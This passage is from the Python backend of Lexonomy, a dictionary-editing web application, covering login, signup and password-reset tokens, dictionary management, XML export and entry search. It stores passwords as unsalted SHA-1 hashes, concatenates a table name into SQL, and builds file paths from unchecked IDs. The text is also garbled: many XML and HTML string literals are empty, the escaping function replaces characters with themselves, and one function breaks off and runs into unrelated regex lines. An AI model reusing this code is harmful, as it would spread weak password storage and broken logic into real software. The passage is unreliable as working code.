and level=1\", (getEntryTitle(xml, configs[\"titling\"], True), entryID))\n dictDB.execute(\"insert into history(entry_id, action, [when], email, xml, historiography) values(?, ?, ?, ?, ?, ?)\", (entryID, \"update\", str(datetime.datetime.utcnow()), email, xml, json.dumps(historiography)))\n dictDB.commit()\n if configs[\"links\"]:\n xml = updateEntryLinkables(dictDB, entryID, xml, configs, True, True)\n return entryID, xml, True, feedback\n\ndef getEntryTitle(xml, titling, plaintext=False):\n if titling.get(\"headwordAnnotationsType\") == \"advanced\" and not plaintext:\n ret = titling[\"headwordAnnotationsAdvanced\"]\n for el in re.findall(r\"%\\([^)]+\\)\", titling[\"headwordAnnotationsAdvanced\"]):\n text = \"\"\n extract = extractText(xml, el[2:-1])\n if len(extract) > 0:\n text = extract[0]\n ret = ret.replace(el, text)\n return ret\n ret = getEntryHeadword(xml, titling.get(\"headword\"))\n if not plaintext:\n ret = \"\" + ret + \"\"\n if titling.get(\"headwordAnnotations\"):\n for hw in titling.get(\"headwordAnnotations\"):\n ret += \" \" if ret != \"\" else \"\"\n ret += \" \".join(extractText(xml, hw))\n return ret\n\ndef getEntryHeadword(xml, headword_elem):\n ret = \"?\"\n arr = extractText(xml, headword_elem)\n if len(arr)>0:\n ret = arr[0]\n else:\n ret = extractFirstText(xml)\n if len(ret) > 255:\n ret = ret[0:255]\n return ret\n\ndef toSortKey_num(match):\n return str(match.group(0)).zfill(15)\n\ndef toSortKey(s, abc):\n keylength = 15\n ret = re.sub(r\"<[<>]+>\", \"\", s).lower()\n pat = r\"[0-9]{1,\" + str(keylength) + \"}\"\n ret = re.sub(pat, toSortKey_num, ret)\n chars = []\n count = 0\n for pos in abc:\n count += 1\n key = \"_\"+str(count).zfill(keylength-1)\n for i, pos2 in enumerate(pos):\n if i > 0:\n count += 1\n chars.append({\"char\":pos2, \"key\": key})\n chars.sort(key=lambda x:len(x[\"char\"]), reverse=True)\n for item in chars:\n if not re.match(r\"^[0-9]$\", item[\"char\"]):\n ret = re.sub(item[\"char\"], item[\"key\"], ret)\n ret = re.sub(r\"[^0-9_]\", \"\", ret)\n return ret\n\ndef getDoctype(xml):\n pat = r\"^<([^>\\/\\s]+)\"\n for match in re.findall(pat, xml):\n return match\n return \"\"\n\ndef getSortTitle(xml, titling):\n if titling.get(\"headwordSorting\"):\n return getEntryHeadword(xml, titling.get(\"headwordSorting\"))\n return getEntryHeadword(xml, titling.get(\"headword\"))\n\ndef generateKey(size=32):\n return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(size))\n\ndef generateDictId(size=8):\n return ''.join(random.choice(\"abcdefghijkmnpqrstuvwxy23456789\") for _ in range(size))\n\ndef login(email, password):\n if siteconfig[\"readonly\"]:\n return {\"success\": False}\n conn = getMainDB()\n passhash = hashlib.sha1(password.encode(\"utf-8\")).hexdigest();\n c = conn.execute(\"select email from users where email=? and passwordHash=?\", (email.lower(), passhash))\n user = c.fetchone()\n if not user:\n return {\"success\": False}\n key = generateKey()\n now = datetime.datetime.utcnow()\n conn.execute(\"update users set sessionKey=?, sessionLast=? 
where email=?\", (key, now, email))\n conn.commit()\n return {\"success\": True, \"email\": user[\"email\"], \"key\": key}\n\ndef logout(user):\n conn = getMainDB()\n conn.execute(\"update users set sessionKey='', sessionLast='' where email=?\", (user[\"email\"],))\n conn.commit()\n return True\n\ndef sendSignupToken(email, remoteip):\n if siteconfig[\"readonly\"]:\n return False\n conn = getMainDB()\n c = conn.execute(\"select email from users where email=?\", (email.lower(),))\n user = c.fetchone()\n if not user:\n token = secrets.token_hex()\n tokenurl = siteconfig[\"baseUrl\"] + \"createaccount/\" + token\n expireDate = datetime.datetime.now() + datetime.timedelta(days=2)\n mailSubject = \"Lexonomy signup\"\n mailText = \"Dear Lexonomy user,\\n\\n\"\n mailText += \"Somebody (hopefully you, from the address \"+remoteip+\") requested to create a new Lexonomy account. Please follow the link below to create your account:\\n\\n\"\n mailText += tokenurl + \"\\n\\n\"\n mailText += \"For security reasons this link is only valid for two days (until \"+expireDate.isoformat()+\"). If you did not request an account, you can safely ignore this message. \\n\\n\"\n mailText += \"Yours,\\nThe Lexonomy team\"\n conn.execute(\"insert into register_tokens (email, requestAddress, token, expiration) values (?, ?, ?, ?)\", (email, remoteip, token, expireDate))\n conn.commit()\n sendmail(email, mailSubject, mailText)\n return True\n else:\n return False\n\ndef sendToken(email, remoteip):\n if siteconfig[\"readonly\"]:\n return False\n conn = getMainDB()\n c = conn.execute(\"select email from users where email=?\", (email.lower(),))\n user = c.fetchone()\n if user:\n token = secrets.token_hex()\n tokenurl = siteconfig[\"baseUrl\"] + \"recoverpwd/\" + token\n expireDate = datetime.datetime.now() + datetime.timedelta(days=2)\n mailSubject = \"Lexonomy password reset\"\n mailText = \"Dear Lexonomy user,\\n\\n\"\n mailText += \"Somebody (hopefully you, from the address \"+remoteip+\") requested a new password for the Lexonomy account \"+email+\". You can reset your password by clicking the link below:\\n\\n\";\n mailText += tokenurl + \"\\n\\n\"\n mailText += \"For security reasons this link is only valid for two days (until \"+expireDate.isoformat()+\"). If you did not request a password reset, you can safely ignore this message. \\n\\n\"\n mailText += \"Yours,\\nThe Lexonomy team\"\n conn.execute(\"insert into recovery_tokens (email, requestAddress, token, expiration) values (?, ?, ?, ?)\", (email, remoteip, token, expireDate))\n conn.commit()\n sendmail(email, mailSubject, mailText)\n return True\n else:\n return False\n\ndef verifyToken(token, tokenType):\n conn = getMainDB()\n c = conn.execute(\"select * from \"+tokenType+\"_tokens where token=? and expiration>=datetime('now') and usedDate is null\", (token,))\n row = c.fetchone()\n if row:\n return True\n else:\n return False\n\ndef createAccount(token, password, remoteip):\n conn = getMainDB()\n c = conn.execute(\"select * from register_tokens where token=? and expiration>=datetime('now') and usedDate is null\", (token,))\n row = c.fetchone()\n if row:\n c2 = conn.execute(\"select * from users where email=?\", (row[\"email\"],))\n row2 = c2.fetchone()\n if not row2:\n passhash = hashlib.sha1(password.encode(\"utf-8\")).hexdigest();\n conn.execute(\"insert into users (email,passwordHash) values (?,?)\", (row[\"email\"], passhash))\n conn.execute(\"update register_tokens set usedDate=datetime('now'), usedAddress=? 
where token=?\", (remoteip, token))\n conn.commit()\n return True\n else:\n return False\n else:\n return False\n\ndef resetPwd(token, password, remoteip):\n conn = getMainDB()\n c = conn.execute(\"select * from recovery_tokens where token=? and expiration>=datetime('now') and usedDate is null\", (token,))\n row = c.fetchone()\n if row:\n passhash = hashlib.sha1(password.encode(\"utf-8\")).hexdigest();\n conn.execute(\"update users set passwordHash=? where email=?\", (passhash, row[\"email\"]))\n conn.execute(\"update recovery_tokens set usedDate=datetime('now'), usedAddress=? where token=?\", (remoteip, token))\n conn.commit()\n return True\n else:\n return False\n\ndef setConsent(email, consent):\n conn = getMainDB()\n conn.execute(\"update users set consent=? where email=?\", (consent, email))\n conn.commit()\n return True\n\ndef changePwd(email, password):\n conn = getMainDB()\n passhash = hashlib.sha1(password.encode(\"utf-8\")).hexdigest();\n conn.execute(\"update users set passwordHash=? where email=?\", (passhash, email))\n conn.commit()\n return True\n\ndef changeSkeUserName(email, ske_userName):\n conn = getMainDB()\n conn.execute(\"update users set ske_username=? where email=?\", (ske_userName, email))\n conn.commit()\n return True\n\ndef changeSkeApiKey(email, ske_apiKey):\n conn = getMainDB()\n conn.execute(\"update users set ske_apiKey=? where email=?\", (ske_apiKey, email))\n conn.commit()\n return True\n\ndef updateUserApiKey(user, apiKey):\n conn = getMainDB()\n conn.execute(\"update users set apiKey=? where email=?\", (apiKey, user[\"email\"]))\n conn.commit()\n sendApiKeyToSke(user, apiKey)\n return True\n\ndef sendApiKeyToSke(user, apiKey):\n if user[\"ske_username\"] and user[\"ske_apiKey\"]:\n data = json.dumps({\"options\": {\"settings_lexonomyApiKey\": apiKey, \"settings_lexonomyEmail\": user[\"email\"].lower()}})\n queryData = urllib.parse.urlencode({ \"username\": user[\"ske_username\"], \"api_key\": user[\"ske_apiKey\"], \"json\": data })\n url = \"https://api.sketchengine.eu/bonito/run.cgi/set_user_options?\" + queryData\n res = urllib.request.urlopen(url)\n return True\n\ndef prepareApiKeyForSke(email):\n conn = getMainDB()\n c = conn.execute(\"select * from users where email=?\", (email,))\n row = c.fetchone()\n if row:\n if row[\"apiKey\"] == None or row[\"apiKey\"] == \"\":\n lexapi = generateKey()\n conn.execute(\"update users set apiKey=? where email=?\", (lexapi, email))\n conn.commit()\n else:\n lexapi = row[\"apiKey\"]\n sendApiKeyToSke(row, lexapi)\n return True\n\n\ndef processJWT(user, jwtdata):\n conn = getMainDB()\n c = conn.execute(\"select * from users where ske_id=?\", (jwtdata[\"user\"][\"id\"],))\n row = c.fetchone()\n key = generateKey()\n now = datetime.datetime.utcnow()\n if row:\n #if SkE ID in database = log in user\n conn.execute(\"update users set sessionKey=?, sessionLast=? where email=?\", (key, now, row[\"email\"]))\n conn.commit()\n prepareApiKeyForSke(row[\"email\"])\n return {\"success\": True, \"email\": row[\"email\"], \"key\": key}\n else:\n if user[\"loggedin\"]:\n #user logged in = save SkE ID in database\n conn.execute(\"update users set ske_id=?, ske_username=?, ske_apiKey=?, sessionKey=?, sessionLast=? 
where email=?\", (jwtdata[\"user\"][\"id\"], jwtdata[\"user\"][\"username\"], jwtdata[\"user\"][\"api_key\"], key, now, user[\"email\"]))\n conn.commit()\n prepareApiKeyForSke(user[\"email\"])\n return {\"success\": True, \"email\": user[\"email\"], \"key\": key}\n else:\n #user not logged in = register and log in\n email = jwtdata[\"user\"][\"email\"].lower()\n c2 = conn.execute(\"select * from users where email=?\", (email,))\n row2 = c2.fetchone()\n if not row2:\n lexapi = generateKey()\n conn.execute(\"insert into users (email, passwordHash, ske_id, ske_username, ske_apiKey, sessionKey, sessionLast, apiKey) values (?, null, ?, ?, ?, ?, ?, ?)\", (email, jwtdata[\"user\"][\"id\"], jwtdata[\"user\"][\"username\"], jwtdata[\"user\"][\"api_key\"], key, now, lexapi))\n conn.commit()\n prepareApiKeyForSke(email)\n return {\"success\": True, \"email\": email, \"key\": key}\n else:\n return {\"success\": False, \"error\": \"user with email \" + email + \" already exists. Log-in and connect account to SkE.\"}\n\n\ndef dictExists(dictID):\n return os.path.isfile(os.path.join(siteconfig[\"dataDir\"], \"dicts/\" + dictID + \".sqlite\"))\n\ndef suggestDictId():\n dictid = generateDictId()\n while dictid in prohibitedDictIDs or dictExists(dictid):\n dictid = generateDictId()\n return dictid\n\ndef makeDict(dictID, template, title, blurb, email):\n if title == \"\":\n title = \"?\"\n if blurb == \"\":\n blurb = \"\"\n if dictID in prohibitedDictIDs or dictExists(dictID):\n return False\n if not template.startswith(\"/\"):\n template = \"dictTemplates/\" + template + \".sqlite\"\n shutil.copy(template, os.path.join(siteconfig[\"dataDir\"], \"dicts/\" + dictID + \".sqlite\"))\n users = {email: {\"canEdit\": True, \"canConfig\": True, \"canDownload\": True, \"canUpload\": True}}\n dictDB = getDB(dictID)\n dictDB.execute(\"update configs set json=? where id='users'\", (json.dumps(users),))\n ident = {\"title\": title, \"blurb\": blurb}\n dictDB.execute(\"update configs set json=? where id='ident'\", (json.dumps(ident),))\n dictDB.commit()\n attachDict(dictDB, dictID)\n return True\n\ndef attachDict(dictDB, dictID):\n configs = readDictConfigs(dictDB)\n conn = getMainDB()\n conn.execute(\"delete from dicts where id=?\", (dictID,))\n conn.execute(\"delete from user_dict where dict_id=?\", (dictID,))\n title = configs[\"ident\"][\"title\"]\n conn.execute(\"insert into dicts(id, title) values (?, ?)\", (dictID, title))\n for email in configs[\"users\"]:\n conn.execute(\"insert into user_dict(dict_id, user_email) values (?, ?)\", (dictID, email.lower()))\n conn.commit()\n\ndef cloneDict(dictID, email):\n newID = suggestDictId()\n shutil.copy(os.path.join(siteconfig[\"dataDir\"], \"dicts/\" + dictID + \".sqlite\"), os.path.join(siteconfig[\"dataDir\"], \"dicts/\" + newID + \".sqlite\"))\n newDB = getDB(newID)\n res = newDB.execute(\"select json from configs where id='ident'\")\n row = res.fetchone()\n ident = {\"title\": \"?\", \"blurb\": \"?\"}\n if row:\n ident = json.loads(row[\"json\"])\n ident[\"title\"] = \"Clone of \" + ident[\"title\"]\n newDB.execute(\"update configs set json=? 
where id='ident'\", (json.dumps(ident),))\n newDB.commit()\n attachDict(newDB, newID)\n return {\"success\": True, \"dictID\": newID, \"title\": ident[\"title\"]}\n\ndef destroyDict(dictID):\n conn = getMainDB()\n conn.execute(\"delete from dicts where id=?\", (dictID,))\n conn.execute(\"delete from user_dict where dict_id=?\", (dictID,))\n conn.commit()\n os.remove(os.path.join(siteconfig[\"dataDir\"], \"dicts/\" + dictID + \".sqlite\"))\n return True\n\ndef moveDict(oldID, newID):\n if newID in prohibitedDictIDs or dictExists(newID):\n return False\n shutil.move(os.path.join(siteconfig[\"dataDir\"], \"dicts/\" + oldID + \".sqlite\"), os.path.join(siteconfig[\"dataDir\"], \"dicts/\" + newID + \".sqlite\"))\n conn = getMainDB()\n conn.execute(\"delete from dicts where id=?\", (oldID,))\n conn.commit()\n dictDB = getDB(newID)\n attachDict(dictDB, newID)\n return True\n\ndef getDoc(docID):\n if os.path.isfile(\"docs/\"+docID+\".md\"):\n doc = {\"id\": docID, \"title\":\"\", \"html\": \"\"}\n html = markdown.markdown(open(\"docs/\"+docID+\".md\").read())\n title = re.search('

<h1>([^<]*)</h1>
', html)\n if title:\n doc[\"title\"] = re.sub('<\\/?h1>','', title.group(0))\n doc[\"html\"] = html\n return doc\n else:\n return False\n\ndef getDictsByUser(email):\n dicts = []\n conn = getMainDB()\n c = conn.execute(\"select d.id, d.title from dicts as d inner join user_dict as ud on ud.dict_id=d.id where ud.user_email=? order by d.title\", (email,))\n for r in c.fetchall():\n info = {\"id\": r[\"id\"], \"title\": r[\"title\"]}\n try:\n configs = readDictConfigs(getDB(r[\"id\"]))\n if configs[\"users\"][email] and configs[\"users\"][email][\"canConfig\"]:\n info[\"currentUserCanDelete\"] = True\n except:\n info[\"broken\"] = True\n dicts.append(info)\n return dicts\n\ndef listUsers(searchtext, howmany):\n conn = getMainDB()\n c = conn.execute(\"select * from users where email like ? order by email limit ?\", (\"%\"+searchtext+\"%\", howmany))\n users = []\n for r in c.fetchall():\n users.append({\"id\": r[\"email\"], \"title\": r[\"email\"]})\n c = conn.execute(\"select count(*) as total from users where email like ?\", (\"%\"+searchtext+\"%\", ))\n r = c.fetchone()\n total = r[\"total\"]\n return {\"entries\":users, \"total\": total}\n\ndef createUser(xml):\n from lxml import etree as ET\n root = ET.fromstring(xml)\n email = root.attrib[\"email\"]\n passhash = hashlib.sha1(root.attrib[\"password\"].encode(\"utf-8\")).hexdigest();\n conn = getMainDB()\n conn.execute(\"insert into users(email, passwordHash) values(?, ?)\", (email.lower(), passhash))\n conn.commit()\n return {\"entryID\": email, \"adjustedXml\": readUser(email)[\"xml\"]}\n\ndef updateUser(email, xml):\n from lxml import etree as ET\n root = ET.fromstring(xml)\n if root.attrib['password']:\n passhash = hashlib.sha1(root.attrib[\"password\"].encode(\"utf-8\")).hexdigest();\n conn = getMainDB()\n conn.execute(\"update users set passwordHash=? where email=?\", (passhash, email.lower()))\n conn.commit()\n return readUser(email)\n\ndef deleteUser(email):\n conn = getMainDB()\n conn.execute(\"delete from users where email=?\", (email.lower(),))\n conn.commit()\n return True\n\ndef readUser(email):\n conn = getMainDB()\n c = conn.execute(\"select * from users where email=?\", (email.lower(), ))\n r = c.fetchone()\n if r:\n if r[\"sessionLast\"]:\n xml = \"\"\n else:\n xml = \"\"\n c2 = conn.execute(\"select d.id, d.title from user_dict as ud inner join dicts as d on d.id=ud.dict_id where ud.user_email=? order by d.title\", (r[\"email\"], ))\n for r2 in c2.fetchall():\n xml += \"\"\n xml += \"\"\n return {\"email\": r[\"email\"], \"xml\": xml}\n else:\n return {\"email\":\"\", \"xml\":\"\"}\n\ndef listDicts(searchtext, howmany):\n conn = getMainDB()\n c = conn.execute(\"select * from dicts where id like ? or title like ? order by id limit ?\", (\"%\"+searchtext+\"%\", \"%\"+searchtext+\"%\", howmany))\n dicts = []\n for r in c.fetchall():\n dicts.append({\"id\": r[\"id\"], \"title\": r[\"title\"]})\n c = conn.execute(\"select count(*) as total from dicts where id like ? or title like ?\", (\"%\"+searchtext+\"%\", \"%\"+searchtext+\"%\"))\n r = c.fetchone()\n total = r[\"total\"]\n return {\"entries\": dicts, \"total\": total}\n\ndef readDict(dictId):\n conn = getMainDB()\n c = conn.execute(\"select * from dicts where id=?\", (dictId, ))\n r = c.fetchone()\n if r:\n xml = \"\"\n c2 = conn.execute(\"select u.email from user_dict as ud inner join users as u on u.email=ud.user_email where ud.dict_id=? 
order by u.email\", (r[\"id\"], ))\n for r2 in c2.fetchall():\n xml += \"\"\n xml += \"\"\n return {\"id\": r[\"id\"], \"xml\": xml}\n else:\n return {\"id\":\"\", \"xml\":\"\"}\n\ndef clean4xml(text):\n return text.replace(\"&\", \"&\").replace('\"', \""\").replace(\"'\", \"'\").replace(\"<\", \"<\").replace(\">\", \">\");\n\ndef markdown_text(text):\n return markdown.markdown(text).replace(\"
\\/]*)\\s+xmlns:lxnm=['\\\"]http:\\/\\/www\\.lexonomy\\.eu\\/[\\\"']\", r\"\\1\", xml)\n xml = re.sub(r\"^(<[^>\\/]*)\\s+lxnm:entryID=['\\\"][^\\\"\\']*[\\\"']\", r\"\\1\", xml)\n xml = re.sub(r\"^(<[^>\\/]*)\\s+lxnm:subentryID=['\\\"][^\\\"\\']*[\\\"']\", r\"\\1\", xml)\n xml = re.sub(r\"^(<[^>\\/]*)\\s+lxnm:linkable=['\\\"][^\\\"\\']*[\\\"']\", r\"\\1\", xml)\n #get name of the top-level element\n root = \"\"\n root = re.search(r\"^<([^\\s>\\/]+)\", xml, flags=re.M).group(1)\n #set housekeeping attributes\n if root in subbing:\n xml = re.sub(r\"^<([^\\s>\\/]+)\", r\"<\\1 lxnm:subentryID='\"+entryID+\"'\", xml)\n else:\n xml = re.sub(r\"^<([^\\s>\\/]+)\", r\"<\\1 lxnm:entryID='\"+entryID+\"'\", xml)\n xml = re.sub(r\"^<([^\\s>\\/]+)\", r\"<\\1 xmlns:lxnm='http://www.lexonomy.eu/'\", xml)\n return xml\n\ndef exportEntryXml(dictDB, dictID, entryID, configs, baseUrl):\n c = dictDB.execute(\"select * from entries where id=?\", (entryID,))\n row = c.fetchone()\n if row:\n xml = setHousekeepingAttributes(entryID, row[\"xml\"], configs[\"subbing\"])\n attribs = \" this=\\\"\" + baseUrl + dictID + \"/\" + str(row[\"id\"]) + \".xml\\\"\"\n c2 = dictDB.execute(\"select e1.id, e1.title from entries as e1 where e1.sortkey<(select sortkey from entries where id=?) order by e1.sortkey desc limit 1\", (entryID, ))\n r2 = c2.fetchone()\n if r2:\n attribs += \" previous=\\\"\" + baseUrl + dictID + \"/\" + str(r2[\"id\"]) + \".xml\\\"\"\n c2 = dictDB.execute(\"select e1.id, e1.title from entries as e1 where e1.sortkey>(select sortkey from entries where id=?) order by e1.sortkey asc limit 1\", (entryID, ))\n r2 = c2.fetchone()\n if r2:\n attribs += \" next=\\\"\" + baseUrl + dictID + \"/\" + str(r2[\"id\"]) + \".xml\\\"\"\n xml = \"\" + xml + \"\"\n return {\"entryID\": row[\"id\"], \"xml\": xml}\n else:\n return {\"entryID\": 0, \"xml\": \"\"}\n\ndef readNabesByEntryID(dictDB, dictID, entryID, configs):\n nabes = []\n #before\n c = dictDB.execute(\"select e1.id, e1.title from entries as e1 where e1.doctype=? and e1.sortkey<=(select sortkey from entries where id=?) order by e1.sortkey desc limit 8\", (configs[\"xema\"][\"root\"], entryID))\n for r in c.fetchall():\n nabes.insert(0, {\"id\": r[\"id\"], \"title\": r[\"title\"]})\n #after\n c = dictDB.execute(\"select e1.id, e1.title from entries as e1 where e1.doctype=? and e1.sortkey>(select sortkey from entries where id=?) order by e1.sortkey asc limit 15\", (configs[\"xema\"][\"root\"], entryID))\n for r in c.fetchall():\n nabes.append({\"id\": r[\"id\"], \"title\": r[\"title\"]})\n return nabes\n\ndef readNabesByText(dictDB, dictID, configs, text):\n nabes = []\n if configs[\"titling\"].get(\"abc\") and configs[\"titling\"].get(\"abc\") != \"\":\n abc = configs[\"titling\"].get(\"abc\")\n else:\n abc = configs[\"siteconfig\"][\"defaultAbc\"]\n sortkey = toSortKey(text, abc)\n #before\n c = dictDB.execute(\"select e1.id, e1.title from entries as e1 where doctype=? and e1.sortkey<=? order by e1.sortkey desc limit 8\", (configs[\"xema\"][\"root\"], sortkey))\n for r in c.fetchall():\n nabes.insert(0, {\"id\": r[\"id\"], \"title\": r[\"title\"]})\n #after\n c = dictDB.execute(\"select e1.id, e1.title from entries as e1 where doctype=? and e1.sortkey>? 
order by e1.sortkey asc limit 15\", (configs[\"xema\"][\"root\"], sortkey))\n for r in c.fetchall():\n nabes.append({\"id\": r[\"id\"], \"title\": r[\"title\"]})\n return nabes\n\ndef readRandoms(dictDB):\n configs = readDictConfigs(dictDB)\n limit = 75\n more = False\n randoms = []\n c = dictDB.execute(\"select id, title from entries where doctype=? and id in (select id from entries order by random() limit ?) order by sortkey\", (configs[\"xema\"][\"root\"], limit))\n for r in c.fetchall():\n randoms.append({\"id\": r[\"id\"], \"title\": r[\"title\"]})\n c = dictDB.execute(\"select count(*) as total from entries\")\n r = c.fetchone()\n if r[\"total\"] > limit:\n more = True\n return {\"entries\": randoms, \"more\": more}\n\ndef readRandomOne(dictDB, dictID, configs):\n c = dictDB.execute(\"select id, title, xml from entries where id in (select id from entries where doctype=? order by random() limit 1)\", (configs[\"xema\"][\"root\"], ))\n r = c.fetchone()\n if r:\n return {\"id\": r[\"id\"], \"title\": r[\"title\"], \"xml\": r[\"xml\"]}\n else:\n return {\"id\": 0, \"title\": \"\", \"xml\": \"\"}\n\ndef download_xslt(configs):\n if 'download' in configs and 'xslt' in configs['download'] and configs['download']['xslt'].strip != \"\" and len(configs['download']['xslt']) > 0 and configs['download']['xslt'][0] == \"<\":\n import lxml.etree as ET\n try:\n xslt_dom = ET.XML(configs[\"download\"][\"xslt\"].encode(\"utf-8\"))\n xslt = ET.XSLT(xslt_dom)\n except (ET.XSLTParseError, ET.XMLSyntaxError) as e:\n return \"Failed to parse XSL: {}\".format(e), False\n\n def transform(xml_txt):\n try:\n dom = ET.XML(xml_txt)\n xml_transformed_dom = xslt(dom)\n xml_transformed_byt = ET.tostring(xml_transformed_dom, xml_declaration=False, encoding=\"utf-8\")\n xml_transformed = xml_transformed_byt.decode('utf-8')\n return xml_transformed, True\n except ET.XMLSyntaxError as e:\n return \"Failed to parse content: {}\".format(e), False\n except ET.XSLTParseError as e:\n return \"Failed to use XSL: {}\".format(e), False\n else:\n def transform(xml_text):\n return re.sub(\"><\",\">\\n<\",xml_text), True\n\n return transform\n\n\ndef download(dictDB, dictID, configs):\n rootname = dictID.lstrip(\" 0123456789\")\n if rootname == \"\":\n rootname = \"lexonomy\"\n yield \"<\"+rootname+\">\\n\"\n c = dictDB.execute(\"select id, xml from entries\")\n\n transform = download_xslt(configs)\n\n for r in c.fetchall():\n xml = setHousekeepingAttributes(r[\"id\"], r[\"xml\"], configs[\"subbing\"])\n xml_xsl, success = transform(xml)\n if not success:\n return xml_xsl, 400\n\n yield xml_xsl\n yield \"\\n\"\n\n yield \"\\n\"\n\ndef purge(dictDB, email, historiography):\n dictDB.execute(\"insert into history(entry_id, action, [when], email, xml, historiography) select id, 'purge', ?, ?, xml, ? 
from entries\", (str(datetime.datetime.utcnow()), email, json.dumps(historiography)))\n dictDB.execute(\"delete from entries\")\n dictDB.commit()\n dictDB.execute(\"vacuum\")\n dictDB.commit()\n return True\n\ndef showImportErrors(filename, truncate):\n with open(filename+\".err\", \"r\") as content_file:\n content = content_file.read()\n if (truncate):\n content = content[0:truncate].replace(\"<\", \"<\")\n return {\"errorData\": content, \"truncated\": truncate}\n else:\n return content\n\ndef importfile(dictID, filename, email):\n import subprocess\n pidfile = filename + \".pid\";\n errfile = filename + \".err\";\n if os.path.isfile(pidfile):\n return checkImportStatus(pidfile, errfile)\n try:\n pidfile_f = open(pidfile, \"w\")\n errfile_f = open(errfile, \"w\")\n except:\n return checkImportStatus(pidfile, errfile)\n dbpath = os.path.join(siteconfig[\"dataDir\"], \"dicts/\"+dictID+\".sqlite\")\n p = subprocess.Popen([\"adminscripts/import.py\", dbpath, filename, email], stdout=pidfile_f, stderr=errfile_f, start_new_session=True, close_fds=True)\n return {\"progressMessage\": \"Import started. Please wait...\", \"finished\": False, \"errors\": False}\n\ndef checkImportStatus(pidfile, errfile):\n with open(pidfile, \"r\") as content_file:\n content = content_file.read()\n pid_data = re.split(r\"[\\n\\r]\", content)\n if pid_data[-1] == \"\":\n progress = pid_data[-2]\n else:\n progress = pid_data[-1]\n finished = False\n if \"100%\" in progress:\n finished = True\n errors = False\n if os.path.isfile(errfile) and os.stat(errfile).st_size:\n errors = True\n return {\"progressMessage\": progress, \"finished\": finished, \"errors\": errors}\n\ndef readDoctypesUsed(dictDB):\n c = dictDB.execute(\"select doctype from entries group by doctype order by count(*) desc\")\n doctypes = []\n for r in c.fetchall():\n doctypes.append(r[\"doctype\"])\n return doctypes\n\ndef getLastEditedEntry(dictDB, email):\n c = dictDB.execute(\"select entry_id from history where email=? order by [when] desc limit 1\", (email, ))\n r = c.fetchone()\n if r:\n return str(r[\"entry_id\"])\n else:\n return \"\"\n\ndef listEntriesById(dictDB, entryID, configs):\n c = dictDB.execute(\"select e.id, e.title, e.xml from entries as e where e.id=?\", (entryID,))\n entries = []\n for r in c.fetchall():\n xml = setHousekeepingAttributes(r[\"id\"], r[\"xml\"], configs[\"subbing\"])\n entries.append({\"id\": r[\"id\"], \"title\": r[\"title\"], \"xml\": xml})\n return entries\n\ndef listEntries(dictDB, dictID, configs, doctype, searchtext=\"\", modifier=\"start\", howmany=10, sortdesc=False, reverse=False, fullXML=False):\n searchtext = searchtext.lower()\n if type(sortdesc) == str:\n if sortdesc == \"true\":\n sortdesc = True\n else:\n sortdesc = False\n if \"flag_element\" in configs[\"flagging\"] or fullXML:\n entryXML = \", e.xml \"\n else:\n entryXML = \"\"\n if \"headwordSortDesc\" in configs[\"titling\"]:\n reverse = configs[\"titling\"][\"headwordSortDesc\"]\n if reverse:\n sortdesc = not sortdesc\n if sortdesc:\n sortpar = \" DESC \"\n else:\n sortpar = \"\"\n\n if modifier == \"start\":\n sql1 = \"select s.txt, min(s.level) as level, e.id, e.title\" + entryXML + \" from searchables as s inner join entries as e on e.id=s.entry_id where doctype=? and s.txt like ? group by e.id order by e.sortkey\" + sortpar + \", s.level limit ?\"\n params1 = (doctype, searchtext+\"%\", howmany)\n sql2 = \"select count(distinct s.entry_id) as total from searchables as s inner join entries as e on e.id=s.entry_id where doctype=? 
and s.txt like ?\"\n params2 = (doctype, searchtext+\"%\")\n elif modifier == \"wordstart\":\n sql1 = \"select s.txt, min(s.level) as level, e.id, e.title\" + entryXML + \" from searchables as s inner join entries as e on e.id=s.entry_id where doctype=? and (s.txt like ? or s.txt like ?) group by e.id order by e.sortkey\" + sortpar + \", s.level limit ?\"\n params1 = (doctype, searchtext + \"%\", \"% \" + searchtext + \"%\", howmany)\n sql2 = \"select count(distinct s.entry_id) as total from searchables as s inner join entries as e on e.id=s.entry_id where doctype=? and (s.txt like ? or s.txt like ?)\"\n params2 = (doctype, searchtext + \"%\", \"% \" + searchtext + \"%\")\n elif modifier == \"substring\":\n sql1 = \"select s.txt, min(s.level) as level, e.id, e.title\" + entryXML + \" from searchables as s inner join entries as e on e.id=s.entry_id where doctype=? and s.txt like ? group by e.id order by e.sortkey\" + sortpar + \", s.level limit ?\"\n params1 = (doctype, \"% \" + searchtext + \"%\", howmany)\n sql2 = \"select count(distinct s.entry_id) as total from searchables as s inner join entries as e on e.id=s.entry_id where doctype=? and s.txt like ?\"\n params2 = (doctype, \"% \" + searchtext + \"%\")\n elif modifier == \"exact\":\n sql1 = \"select s.txt, min(s.level) as level, e.id, e.title\" + entryXML + \" from searchables as s inner join entries as e on e.id=s.entry_id where doctype=? and s.txt=? group by e.id order by e.sortkey\" + sortpar + \", s.level limit ?\"\n params1 = (doctype, searchtext, howmany)\n sql2 = \"select count(distinct s.entry_id) as total from searchables as s inner join entries as e on e.id=s.entry_id where doctype=? and s.txt=?\"\n params2 = (doctype, searchtext)\n c1 = dictDB.execute(sql1, params1)\n entries = []\n for r1 in c1.fetchall():\n item = {\"id\": r1[\"id\"], \"title\": r1[\"title\"]}\n if \"flag_element\" in configs[\"flagging\"]:\n item[\"flag\"] = extractText(r1[\"xml\"], configs[\"flagging\"][\"flag_element\"])\n if fullXML:\n item[\"xml\"] = setHousekeepingAttributes(r1[\"id\"], r1[\"xml\"], configs[\"subbing\"])\n if r1[\"level\"] > 1:\n item[\"title\"] += \" ← \" + r1[\"txt\"] + \"\"\n entries.append(item)\n c2 = dictDB.execute(sql2, params2)\n r2 = c2.fetchone()\n total = r2[\"total\"]\n return total, entries\n\ndef listEntriesPublic(dictDB, dictID, configs, searchtext):\n howmany = 100\n sql_list = \"select s.txt, min(s.level) as level, e.id, e.title, case when s.txt=? then 1 else 2 end as priority from searchables as s inner join entries as e on e.id=s.entry_id where s.txt like ? and e.doctype=? 
